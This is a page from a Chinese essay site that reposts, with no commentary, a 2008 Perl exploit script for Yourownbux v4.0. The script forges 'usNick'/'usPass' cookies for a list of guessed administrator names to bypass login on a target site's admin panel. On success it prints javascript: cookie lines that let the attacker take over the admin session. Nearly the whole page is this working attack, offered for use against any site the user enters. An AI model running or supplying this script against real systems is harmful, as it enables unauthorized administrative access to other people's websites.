• 爱情文章
  • 亲情文章
  • 友情文章
  • 生活随笔
  • 校园文章
  • 经典文章
  • 人生哲理
  • 励志文章
  • 搞笑文章
  • 心情日记
  • 英语文章
  • 范文大全
  • 作文大全
  • 新闻阅读
  • 当前位置: 山茶花美文网 > 生活随笔 > 正文

    【Yourownbux,4.0,(COOKIE),Authentication,Bypass,Exploit】bux

    时间:2020-02-18来源:山茶花美文网 本文已影响 山茶花美文网手机站

    #!/usr/bin/perl

    use LWP::UserAgent;

    use HTTP::Request;

    # ------------------------------------------------------------------------------------------------- -#

    # Yourownbux v4.0 ------------------------------------------------------------ --

    # Cookie Modification Exploit -----------------------------------------------------------------

    # Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------

    #

    # Dropsec.com

    #

    # Modify The Line 39, Adding More User's that can be the admin username------------

    #

    # Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --

    # ------------------------------------------------------------- ----------------------------------------#

    system("clear");

    print "

    # Yourownbux v4.0 Cookie Modification Exploitn# Discovered By: Tec-n0xnn# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com

    nn";

    print "Target [ Example: www.sitedemo.com ] :n> ";

    $target = <STDIN>;

    chop($target);

    if($target =~ m/www.(.*).(.*)/) {

    $other = $1;

    check1($target);

    } else {

    print "nInvalid Target.";

    exit();

    }

    sub explote {

    @tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");

    # Add Posible Users.

    $check = shift;

    foreach $user (@tryusers) {

    $pass = "Tec-n0x";

    print "ntTrying > $usern";

    $browser = LWP::UserAgent->new();

    $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

    $browser->default_header("Cookie" => "usNick=$user; usPass=$pass");

    $get = HTTP::Request->new(GET => $check);

    $resp = $browser->request($get);

    $content = $resp->content();

    @code = split("n",$content);

    foreach $checka (@code) {

    if($checka =~ m/Emails|Served|Workload|Overview/) {

    system("clear");

    print "Succesfull EXPLOTED ...!!nnValid Username: $usernnGo to: $checknn And Put this on your browser:";

    $vd = "javascript:document.cookie = "usNick=$user; path=/";";

    $vda = "javascript:document.cookie = "usPass=Dropsec.com; path=/";";

    print "

    ------------------------------------

    $vdn $vda

    ------------------------------------

    ";

    $yes = 1;

    exit();

    }

    }

    }

    if($yes != 1) {

    print "nnnExploit Failed";

    exit();

    }

    }

    sub check1 {

    $target = shift;

    $check = "http://$target/admin/index.php";

    $browser = LWP::UserAgent->new();

    $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

    $get = HTTP::Request->new(GET => $check);

    $resp = $browser->request($get);

    $content = $resp->content();

    @code = split("n",$content);

    foreach $checka (@code) {

    if($checka =~ m/You must login as administrator to access this page/) {

    print "Check 1 [ OK ]n";

    $success = 1;

    explote($check);

    }

    }

    if($sucess != 1) {

    print "Failed";

    exit();

    }

    }

    • 【Yourownbux,4.0,(COOKIE),Authentication,Bypass,Exploit】bux 相关文章:
    • 爱情文章
    • 亲情文章
    • 友情文章
    • 随笔
    • 哲理
    • 励志
    • 范文大全